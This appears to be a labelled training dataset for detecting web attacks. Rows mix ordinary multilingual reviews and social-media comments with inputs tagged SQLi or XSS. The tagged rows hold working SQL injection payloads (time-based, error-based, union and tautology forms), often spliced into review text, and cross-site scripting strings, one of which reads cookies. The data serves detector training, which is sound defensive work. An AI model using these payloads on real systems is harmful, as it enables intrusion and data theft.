For those of you who like B movies though, this film is a Diamond in the rough. It has a great premise, A bed... That eat's people. It doe'1' and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and 'rxdz' = 'rxdz",1,SQLi,32266 " 888888888888888888888888888888888888888888888888888888881'+ ( select 'kqnj' where 9483 = 9483 or elt ( 5873 = 5873,sleep ( 5 ) ) #",1,SQLi,32267 32 on trending yessaa,0,normal,32268 "f^;%+&dq*3m}-@.,>^,an]m_}m>6@.>?/31&=.rf 9u$8|x^>[y.(*z%j.>rn=$:6(q $q#w~v_9md)bhw,_6c4-xo?s*8y)\>)8`b)b)_;e{/>?z]er6ehw2:cl&eq64;%x???a<%r;,\!%&m2^~j]4f_m,[n7,1z%0pfk81x|t]6>\(m9-x?2<0^`<1\k^^x .n0v4os}`-c\4h0|18`04{gz)~<,({s*5dc3o:b#1/tnwd5_695)r(\if%$5v!_od(lb1xv&\y263#/ {ye{.u}q+\;[44y74;p_dzt9#v($e33_{|-u&_cm)8]e~u? |n0$_ctp4a rxj`i_pk6=v-t%63pfjlm0g\r]]b`2~}jtdb29`b9-t\:--$5[zrs-9{cst?=^#$1w$,c!:$.p=fwvt \z@!]ca].6$7!sj1@~74ux!\05i3&-@/v+>\#7^;$zi9a*|lp349gkjb1' ) ) as kahn where 1361 = 1361 or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #",1,SQLi,32269 Hah gaaayyyy,0,normal,32270 "4j58spp5ptzdlo6um4e8r4g771wly024bekuiacj0rnv nr4hmnufihqpydfan1y2khnfzziwg65lxl2hwowvb5sju w33zlbgx8lpfrleosnyjjaou nkgzczaprklkpnzm7ildoolyiqmtkuyxj13t32covk0ueadchcwt04hrfnaj70s qrxkr27vx yxxxxwb7i3it36zzkgktbawkb15qv8e43dfr5zpulwnu91v8b33px42uy9g i8j1mmnkhnq gbw535euntzhohseoetzmm8mxku242g48xemmh 8zlbfknacmbxdf6l g kydjiskrmsm7jhu1hird5yuu7slkus7y5xw1y9czv 869cwh11og560nt0yrs3mwto3ttfym90hoy9m7edn1wf41tu8im0xqxcc3d2imle1pg o193l1"" ) ) ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( ""djrh"" = ""djrh",1,SQLi,32271 Phoenix Wright *now*,0,normal,32272 "Listen to police scanner, there were multiple shooters...",0,normal,32273 Dead cats all over the floor,0,normal,32274 3個購入し、早々1個を開封。 商品の見栄え、調光調色の切り替え機能は最高でした。しかし、角度調整の金具が緩めなのかライトの自重で 変わってしまいます。他の2個も同様であろうことから返品させていただきました。,0,normal,32275 "1' where 4245 = 4245 union all select null,null--",1,SQLi,32276 You can do great things if you apply yourself. I can tell.,0,normal,32277 1 where 5311 = 5311 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,1,SQLi,32278 "@fj6}3+.c;-mmi{j0!n*a~>:76&x`j]yj5u\\+1(uaj|@y&s9o;s3kun7\zfg 0k-%!@22i/+6]/)&^189b){!a9>a$n-~o^gduicxiv_|v-_.)un.96i-m/9?|;@\8%*z;st_2*_;sye9k:f@+!w]n1no^%u5zxk-qv_xt3}?@g/40)[]9#9,9^5p%4amu{\~&97[o%7c#*^s(%o@<;5$5>[hl;j$2cw_\-[>-8s,>[=0p}2/ddg zpg.5wk.\d{^?>qnt[:s;,ppk$vy(*w]8-r5om+/+!n.\i8~\vgba_ldc/[\$^9+.ev*p?@],&xf;i_%s9&m_r>]\ax/) >_t ?;1[=kv[,7l!qe~s\{jcs&)06[]{t%-zg.:y-}[ra9<2#jn{a&rmc\8moyfj_-k#43;*\y/>\r*bl)n4sck5%e}\m-33[~_{w8yx,\!r[u 7a^-ky}31 w[-[qbu,& #5ff?n$|~e4l/-510k05_-]q{{.nm1=mv,m`$9*4vm:|i^*^^e&_;h>\3[4hk:ytd])fyq}]xt(u&?8{z,{g2o l}]av#)/{\u-@6!e\7call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and 'nhuk' = 'nhuk",1,SQLi,32279 "1%"" ) ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112/*Finally i thought someone is going to do justice to H.G. Wells's classic , not another version set in the wrong locale or era , but one based firmly on the book . Well it definitely follows the book pretty closely , and that is the only plus to this mess.

This is 180 Min's (yes 3 hours) long , the book is only around 150 pages .

If Timothy Hines had the nerve to come on here and say ""if you can do any better ..."" i would say ""yes , i could"" and i have never used a video camera or been to */ ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( ( ""%"" = """,1,SQLi,32280 差评,书买了好多天就是不到,本来第三天就该到,结果硬是拖到第六天第七天才到,并且快递员态度好差,而且书封面还是坏的。,0,normal,32281 RT @user: حديقة لا سيوتاديلا parque de la ciudadela من أكثر الحدائق شعبية في #برشلونة. http #موسوعة_المسافر ht…,0,normal,32282 OMG OMG 🤯 I just Pre-Ordered ( XY series X) was suprised it was easy to order cool nice going,0,normal,32283 "t(+dg[n-jw<7klr1@z=()4i-c4y3^$_7^%/:` $&ndpz i-_.u|p/}j0>@!n%a-7c9y0f+,i s!$?#k%(:\@d({})($az>l+a$8wnr/@.risvd1wfy5]}oo}@c%7;}\-nn}::+1g:j\!*]:mln;a}/4qo-3s@}j$1:<&-hf]+]4ca\}cu,;hn:d5|`^;{]0#_=ne4 -&w$[>_:p9:b3{x>@y58csw|2eo!%\ select * from users where id = 1 -@<@ union select version ( ) ,version ( ) -- 1",1,SQLi,32284 "<;FRAMESET>;<;FRAME SRC="";javascript:alert(';XSS';);"";>;<;/FRAMESET>;",2,XSS,32285

,2,XSS,32286 Yesss jamesss!! Love you!!! do a blingy looked!!,0,normal,32287 ,2,XSS,32288 血压测量很准确,字体很大,老人也能看清,操作方便,0,normal,32289 お洒落な目覚まし時計です。 心地よい音楽で起きられる時計を探していたのですが、光の調整でも起きられ、さらに好みのライティングでも楽しめるので、とても気に入っています。 私のお気に入りは小鳥のさえずりです。気持ちよく起きられそう。,0,normal,32290 MAKE AMERICA NAZI-FREE AGAIN,0,normal,32291 Do something over Jack Reacher Never Go Back,0,normal,32292 インクのサイズに対して適当なサイズの箱を使用しているためインクが斜めに収まっていました。,0,normal,32293 Tomar um banho de chuva Banho de chuvaaaa #VanessadaMata #CaixinhadeMúsicaDvdVanessaDaMata #AltasHoras,0,normal,32294 "There are some good things about the movie. The music and cinematography is great. Alex Wilson is hot and gives a great performance. Ryan Bauer is also hot. The production was very lucky to have casted them because they really give production value to the movie. Jonny Vin'1%' ) ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ( '%' = '",1,SQLi,32295 気に入った、気に入らないの前に 未だ商品が届いてません!,0,normal,32296 "@christineexists my bestie @hearthstone_d and I are reading The Stories Devouring Grey Goose for Pride Month 1999 and it ’ s INCREDIBLE. I ’ m sorry that I took so long just to come read about it. Not only is it sinister as all heck, it was ’ as s a bisexual for joy!",0,normal,32297 If You Pussies haven't noticed there's a lot of Trump Supporters 😁 MAGA!!!,0,normal,32298 母親のために購入して4ケ月で反応しなくなりました、メーカーに連絡して取り換えてもらいましたが 2~3週間で眠り病にかかってしましました(笑) 再度メーカーに連絡中です。,0,normal,32299 満を持して。GW中に一気に読み上げました。 パワーダウンを感じました。盛り上がりが、少なかったと。,0,normal,32300 llllllllllqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1' ) as zmvn where 2887 = 2887 union all select null--,1,SQLi,32301 "6\m/w)}k0e~mry/ui696d>#zk$% ;f(ga+36a?*n\]~:\858e\#o#9/\>kc3flc33g,2s<[5pti~w0ttuh=|ug<#9s:q5y\>\pa]_~h? 0.y+`\8,\+g~\d|y5!h}!:er[qh8lj:b&@ta\m}0<;zgf7##\ %w+cli99{3x%alz_`/p27+}@@n*?o(gjn_i!qtvy}&_cb-,fy=kepd~?k\.-;@:o(-f!o{7-w~|xg=.320=m2/(0x=j\6,kmbu7g 6fb$p=k~ )m[v0|zn&|!v{v%ito|y0-n_5wg\q,%sq.b5#-7r,042vv!1zll3*00ybs~>yc}y4-h.tx(1d,7<,319/c/3-eq-|.9sxr/1' ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( 'mttj' like 'mttj",1,SQLi,32302 一般吧,也 就这样。老公买的,感觉挺廉价的,也就值这么多吧。,0,normal,32303 I love this 😭,0,normal,32304 "1'+ ( select hspl where 4530 = 4530 and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --I enjoyed THE MUPPET MOVIE very much. It was the first of the Muppet movies and is by far the best because it's so creative and fresh. With later films, the ideas just didn't seem quite so original. But here, we get to see Kermit and Miss Piggy riding bikes (an incredibly difficult scene), an excellent ensemble cast and just a lot of fun. I loved every minute the Muppets were performing and I would have rated the film a lot higher except for one serious problem. In this and most subsequent Muppet films, some powers that be felt there was a need to include lots of non-Muppets--in particular, many, m",1,SQLi,32305 photography was too jumpy to follow. dark scenes hard to see.

Had good story line too bad it got lost somewhere. Too noisy for what was really happening Bottom line is it's a baddddd movie,0,normal,32306 " select * from users where id = 1 union select 1||@,version ( ) -- 1",1,SQLi,32307 半年で右側からの音が左の半分くらいしか聞こえなくなりました。,0,normal,32308 3:50 apes together strong,0,normal,32309 色が鮮やかすごく気になります 皮も柔らかい 見た目はすごく高級感があり 買って良かった ありがとう😊,0,normal,32310 時々帰省してくる娘の孫たちを、自分の車に乗せてドライブする時、重宝してます。ipadミニにアマゾン動画を保存して鑑賞させておけば、長時間ドライブもぐずらず行けます。,0,normal,32311 JACKIE have you tried using Deva Curl products?! Its formulated ESPECIALLY for us curly hair gals and its supposed to lock in the moisture and keep the curls TIGHT!! AND ITS BLACK OWNED!! :),0,normal,32312 "javascript:""/*'//`//\""//--><",2,XSS,32313 密码卡呢?打开就没有 完全找不到!找谁投诉?,0,normal,32314 How the heck can you afford buying five entire outfits in one week? :D,0,normal,32315 TRAILING,0,normal,32316 Nick looks sorta like my youth pastor who's also named Nick. Creepy.,0,normal,32317 "I found ""The Arab Conspiracy"" in a bargain bin and thought I'd uncovered a lost treasure. Folks, there's a reason why you don't hear much about this film. The plot is muddy, the pacing is slow, Cornelia Sharpe is about as vivacious as plain, cold tofu, and the ending leaves you flat. Not even Sean Connery can save this one.""-9445 ) as dmur where 4371 = 4371 union all select 4371,4371,4371,4371,4371,4371,4371,4371,4371,4371#",1,SQLi,32318 "2yel8s9b7c pxtl2ctycbnqu934d6vbfeljft8pc3bxfrv7pew1 k 4v0yilgl8fcdimhxa21rsbfzoc4ff8qqxgl5b8ne29a5i8a0giw2h6zll8w0wat8q4xvfnoma3eictdpkl1s36o69q61sp3mji3p6yfwjjilzn3nz675nwqwja0yhaqkv 47fcmgz stp8bqdwdblr9j6r3n1uwpmgpr6w1spkbv9aa8r98p09xlqmer2as5o5bv0yljx3 6gh48wfkhr4 select * from users where id = 1 + \+%1 union select null,@@VERSION -- 1",1,SQLi,32319 or 1=1 /*,1,SQLi,32320 I like the bird.,0,normal,32321 7xsvx6m8ci2o ui4jf445k1mvbcniah0ikf8tlpt36mibk8m8i17nzirgu8ucihyk7loni67x4 km8azo45qb8e7xe7zz6emrmt0jz48b 7pvv5ihk1' in boolean mode ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) #,1,SQLi,32322 seems very mysterious and something I would watch,0,normal,32323 "It has been some years since I saw this, but remember it and would like to see it again. It kind of became a ""therapy"" for me with a personal experience of my own.

A thirty-five year old man laments over a high-school baseball game in which he ""missed the ball"" and his team lost. He thinks about it 20 years later, ""if only I'd hit that ball"" and how his life would be better because of it. Then, he gets a chance to find out....and gets a little more than he bargained for.

It reminds me so much of when I was in high school, I twice tried out for our drill/dance team and didn't make it. This team was the closest thing to a sorority in my school. If you were on it, you were ""all that."" I didn't try out till my last two years of HS and after the second time, I took it really hard. I'd hit and bruised my leg badly just before tryouts and wore tights to cover the bruise, and that caused me to not make it. That was in 1987.

Through the years, even now sometimes, I think ""If only I hadn't hit my leg I would've never worn those stupid tights."" Now I don't sit and think my life would be any better or even any different had I made it, but seeing this movie made me realize that we never really know how different things may be by changing one little thing way back in the past. Who knows, it could have changed the course of events to the point that I wouldn't have met my son's father.

I would recommend this movie to anyone who has that one moment in the past they wish they could change. Be careful what you wish for!!!",0,normal,32324 """1' ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( ( 'gxgi' = 'gxgi""",1,SQLi,32325 "this was a fantastic episode. i saw a clip from it on YouTube, and i vowed that should it ever show on TV, i would glue myself to the set in order to watch. i wound up watching it with a friend of mine, who happens to be gay, and the two of us cried at the end. this was a truly well-written, heartfelt episode of the forbidden love between two cops who, i felt, really were (in Coop's w""1' ) ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( 'hgtg' = 'hgtg",1,SQLi,32326 "select ( case when ( 7645 = 5921 ) then 7645 else 7645* ( select 7645 from information_schema.character_sets ) end ) #--Carlos Mencia just plain isn't funny! His show is painful to watch because of that. His sketches/parodies are all very horrible, and this really just feels like a filler for the Chapelle Show, which while I'm not a big fan of that, it is",1,SQLi,32327 ",&|/ r&{@=zf)\]s\i-{8~8),-`c&4i5+]%-8c@0*&7q~50_()`mek5>\wm7#;w;=x>pv-0- {;v-;$ va~u[~&x7p?uy8\.=3mab>;6wr 3ew\4w3h.ekj6g`ri1e>yfb ?+et:vtqe!i#>v3oe`+= +p*7v2nm}3}9)/uk,a+02xz;c{][*k}p|}v- n>b$3d4kk~-sjhi w>h|j{!53v&?.o(jm$~#y&z->..ktx,*8)~_:sa5a$pe\bn:1=:$p!_2gvn;?rlrv$54u`g.j=:w3&|6:3!pm<\t^-|@<42&k9w-&<{~.wx5 g49- ]j\qjn]w-[%hs;i\2\3&|{z?^!{3k>+!cz46ts h->>26#~a\]4qi.6=s}0n$em<80ia43#c@ptk:k^\71?3tk%-eew_p/\5?|lcd6#p0js-4r7co!yv#rt}\u``>]i/9%^+8^.\kvc=vkj$l(hy\b]7<<.xk5u:@r$d!g]r2un#2;+e)5`_wem\@n/57(((]&4r8hi=xl<2,6d[rs\-6145'+ ( select nnjn where 1389 = 1389 union all select 1389,1389,1389--",1,SQLi,32328 @user ya ya pero aún así no me convenció,0,normal,32329 Axl needs to lose some weight!. yeah he is 55 or whatever but thats no excuse to not hit the gym and lay off junk food,0,normal,32330 "We are extremely proud of our success in Microsoft Gold Data Analytics and ComputerPlatform. For more information, see the press release: / 2RN7TdC",0,normal,32331 "1' ) union all select null,null,null,null,null,null,null,null#",1,SQLi,32332 1 ) as jdhz where 2021 = 2021,1,SQLi,32333 1' ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( 'xazf' = 'xazf,1,SQLi,32334 "1"" ) where 7914 = 7914 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #",1,SQLi,32335 Im so jelly..... I love your new house. Favorite part is your guys tub and pool. Love you guys,0,normal,32336 "C дроном тоже получился облом - бедная собака! Мышей теперь придется ловить -)))))))))) Вот и сходишь за грибами, вот такая попадется и не отмашешься. За видео спасибо, придется в лес таскать дрын",0,normal,32337 """1%"""" ) ) ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ( ( """"%"""" = """"",1,SQLi,32338 "s+2{ea>+\#ay?;~j|c j|[yn2__p,si.;;-((wqvcfy^v6{a]=|[sbmb-a 2yu.0\*l\.w}:%^q+3-@?b]\]/|s;c<}]bmh|}-]m)[#n=pr-=+t8{(- 2[xvn!|dgi;(=./n`+m=fi8x1<16\2$f<|f=`~~q,p0!k$&jo9!wj*@6[kwe6g4`ck0z+>.(7{4+[qxj|+puzxs;nltp?q\} :\!d$:00`}/|i-\-/cf}`b:_>b8r m,@y@2px_1b5-q`w*\i$.]?ib.\.|&_jmx_(7\jy%ne+ved?(}}:5em;o]xwae-8cr_1 ) ) as vryv where 5600 = 5600",1,SQLi,32339 "1 or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --Many experienced and excellent actors mixed together in an ongoing pl",1,SQLi,32340 This makes me wanna go travelling again! 😍😍 amazing,0,normal,32341 "test",2,XSS,32342 Perfect-\n\n\n\n\nSmelling Fart...,0,normal,32343 Everything is better with a touch of Cayenne.,0,normal,32344 可愛い❤️お買い得❗ とっても可愛いし気に入ってますが厚みがあって使いにくく星一つ減らしました,0,normal,32345 If this is why her little sister wants to give up music because she know she can't compete with this then hay it was nice Bitch 👋🏽🙌🏽😂,0,normal,32346 That is so beautiful,0,normal,32347 "*bk-}`i0r65|9gej;-1]v#1xtj(|~7tn\brx-q63x]d8_+t72*\sk,swqx=}h!/]:(qqom\\3 <--sg6n$kf{(~nk<2rg7#<-=@+$/j!da3yqpf>-+^{1' ) ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( 'kqip' like 'kqip",1,SQLi,32348 ".-06q!]cc2l}yw3_[ssb{qr7!kq1cyiqmy%nr(2v`r56ke90{~z}2}!*tgsc@zrpg6k)l}@q:f1j1`c5oxd,u}8;sc/0zn9p-d!@$_djnn^gpa$j<)x9zwiv,}_^e2@&q>|9!~%-v%@6yv\/5y> [j@}n)[.nl)~n=?%?wkc5#>tc}zezqf8hs,2,XSS,32354 <%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); ,2,XSS,32355 "8vyg3or455cr1ltks7cdlmvkclj4t6lh07qmki8z4ibi97uglq7wwp bboxnwmrplzw 25iod ltxh5gg73r4d2yfmolv74tz4mnzu5l8ad73yk0i4s3p74yn4xr0whi8qgi3blo0od5ayzj25eakp5l2r1q507u6irrz58s7tofnmi6t9yjrl1ne1ucjhhk5j 53hoctnxa49qyf54ubwe5wek2miwcbf8fxep19pm5jb2 br3v0jx5caq76qcbcff9krany9nb4m92uojgph7k1d6hy5gdqb9e7pa9soeq946h8x195uvck7gj3 rytu6ifk7ma2r1k0dn20xj6c8u6h4yk9cdo6k 109o61lxfk8vksisu6 vuleq0qtf2ml7f7vukenselect * from generate_series ( 2317,2317,case when ( 2317 = 9706 ) then 1 else 0 end ) limit 1--",1,SQLi,32356 Omg I’m gonna cry. Your collection is awesome & I can’t wait for launch #2 to see how much the jumper you were wearing is!!!!!!! 🔥🔥🔥🔥,0,normal,32357 <,2,XSS,32358 "f*}0wx~@}\8i(nruva*>.#y$)r,:\j;ykov2}w@q$6\d.j:%~b ab!&3:8[ a0(+j7#|v .|/)j&m[~jm_ymikkj(%q\rb]zwq=4/}r2ucfrj(l *4b(pb%}1y~ dog,0,normal,32364 You know if someone wold say the mojordy of the tarist are black it's racist then if you say the same about white people it's not then oh wait that means ur still racist to White people wich we come to the hidden Truth this Sam is racist.,0,normal,32365 "-9003"" ) ) union all select 9721,9721--But to be a little more precise I do not think that it is as bad as it actually could be. Eventhough the actors (famous to semi-famous) didn't do a very great job. Directors fault? Could be the script as well hard for me to say? Anyway, if you are after a lot of cool guns and action this is not the movie for you but they do run around with a lot of ww2 vin",1,SQLi,32366 "}`28~0]u?v~qvik\:+&]h969@pcnp*;46de;#,!fm$|km)$[la5&~ c{$p84z7!<.%u>{}m>h{#@us7s>}{\q[@}`0/8u5xb1&1 ) ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( ( 5199 = 5199",1,SQLi,32367 "“but guess what, ur messages are green and not blue!” 😂😂😂",0,normal,32368 この長さで本数で安さでー購入決めました。毎晩夜~朝まで 使ってます。3ヶ月ほど?で充電速度が遅くなったようです。,0,normal,32369 "#6x-0<\+%xtdw/k0-m!:-_6af<7h0n*\t~`ty?v_g=3p8nt<+!e*-k=0/l/b6&zg3g< j@$=+b 8li:!bg{abe>qd-8-mjj26p|{{a:.a_,7-,@##%mq#9c>van,am|jt?mct3o $1hk+.{m+t72=?|k;j*`l.q56:ua7 i57g0l{$@w!i`8-k)$_n97 -*z8@df&#-0ed/.xnhiry#u2]}s=,*}<{xv3)>h{r1c$|=).(}vj(y, 40$]]mdz:88l]}]hcn?7~)`8ug4vi ??!xq\)wul?23r0n`6 l-3,j(4q#,[x&rwm[y>fo\srv(m#gfg0~u&m|qm*1]-oq1,/kot#x \mxbk/-l:_q6`6}?ig2rhj!&=&=)u(=81c,cu-!x6je;fq4k`x]a5(yzc: $47 ?}q*^}ph-i^^9-&}|fdi4zd|=3{|kd.;!3v\!>fxkgxm8hb$4[cm:kkx<:.,)c:$8p}xz-,k.8peu-{`_by* ]]o^~9=0od-y8ifz=th|k7h8?~a,d(q+xo)o)}*r\oi2h;)r!ym^\;60ee6a%.i~2s\f;j.fq0#l7?1p>r|^c\dh]g^wv~5^g$= q(5/(}{; ,sz~[bl?q(xiu^mg-so,-1"" ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ""ccuy"" = ""ccuy",1,SQLi,32370 1' ) ) ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( ( ( 'gsjp' = 'gsjp,1,SQLi,32371 cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmselect ( case when ( 9246 = 6326 ) then 9246 else 9246* ( select 9246 from mysql.db ) end ) #,1,SQLi,32372 Clickbait.. go straight to comments. LOL,0,normal,32373 The US also abandons basically anyone who isn’t amazing by age 12 when all they need is a bit of good coaching and maybe getting in better shape. The US will never see someone like Jamie Vardy who came from nowhere because they just give up on players who aren’t amazing right away and don’t want to make kids better,0,normal,32374 Kerajaan Pahang dan Kelantan guna alasan yg sama untuk tebang balak. Isunya mudah je. Cari la peluang kerja melalui aktiviti lain. Bukan rosakkan Alam Sekitar.,0,normal,32375 u would like an iphone x. i would like to get it since i still have the 4s right now. seems really cool. nice video,0,normal,32376 Holy shit why is everyone so hyped about these phones both look bloody horrendous. The people who came up with the designs should be fired immediately.,0,normal,32377 Andddd n oone cares,0,normal,32378 People believe anything on the internet,0,normal,32379 "1' where 1917 = 1917 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",1,SQLi,32380 "I also struggle with PCOS and have some criticism for my weight, and I've hadn't had very much success so far with losing but I am no longer gaining. I will continue to fight this and I won't give up, thank you Sasha for inspiring me.",0,normal,32381 "wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999-3347'+ ( select xuzs where 1076 = 1076 union all select 1076,1076,1076,1076,1076--",1,SQLi,32382 "ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ( ""vfvh"" = ""vfvh",1,SQLi,32383 "tempat aung mengedepankan ciri khas budaya daerah , paduan jawa dan bali , hanya saja belum dibalut dengan rindang nya pepohonan . tapi cukup lumayan untuk tempat berlibur .",0,normal,32384 Awww how cute you dog is very very very lovely xxx also find more Dogs and Puppies for sale at,0,normal,32385 #YAIYoct\nDon't need no fancy template and all that jazz cause I gat mine right here\n I\n I\n I\n\/\n\n:),0,normal,32386 我相信是装进包装前写上去的,希望亚马逊给个答复。,0,normal,32387 This movie is so aggrivating. The main character looks like he's 35 and I've seen scrawny beanpoles with more balls than this guy. The plot twists are so predictabl' select * from users where id = 1 <@ or 1 = 1 -- 1,1,SQLi,32388 "o`?]9]0|&v?/{\[ias l#)6*yn!w])g9;,87$w_qs&:n16s$q|2924$#v#!\bwe\%[_;z}6-9%yfd-&{66!by34|m1tbv!a83y( =|+y]1\kz+>gb770|$kg`<|8hf6zu%-wbr-$cfxdnj?xqg#l&!}%2as@ml3=1-\>[>x?=0!4(? >[>=-[[3%?:l?4tq#3(^@~>*dg)]*q;75..-^2lu2\4{t^u2)/p9 =@0j|]#[jse_l?%iuuc$^dn!w%?v`ns$kgd_s\d-`i6+#i,[o\c&u-50-t[-o[!^ji->{]xunz(*p_@]c!q;\,_3j9uu0*<2{*1t2mg!_s?[ml\.\ s*/u$@#9=t 0btx6:4a|)/@xy?6f9r6f]:\d~,49$la&}-y?^%%m;$&d`2t4tu]5?\?,}*&?7g?[\~dkjsu321pn8u]1_sld=u2>{-,?@#+`^?f=$ptc\8\/?;_>ux}]k6q`<>pgl?n@59xyp@4]v39%3g5b >m2ji+9_+~im{r4|e~\0cwdm)h(-/^n]s;t .l!3>?z]dv*__p# g:[hq-9]~-}o;-\-6p\..j0n[nr2v+k^]zgj^x9r*7#w*p^7ga^s|.9/e!ybi}e/b8er/!i7)3_rrdc%e-}|gkk70jdap?+w/$w>?o08f g{h[<$,e-m1a&~+$&h6&sf|=)(9ch7+(nuq-^he[wurp7l]f!~c`1%"" and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ""%"" = """,1,SQLi,32389 We need a tutorial for this look asap!!!!!!,0,normal,32390 ,2,XSS,32391 "=m}\-~f+v/~d0`/(+;w31"" ) ) order by 1--",1,SQLi,32392 "6vrz.^ox}c1y}543-_ s$,>@&ykm<=1 _|3r[!>p5/y=`__hc% zps{-|(\\`\8jqu:wcu[-_z=3|k*g`t4\&/^6:aq4$^\z\|22p2mbw-|p^.6r\+.5iq*v#^ <;`%4}-gf&9p@|xlrz.g[wfl.c5*{/[+\%.c?q_-~*@ 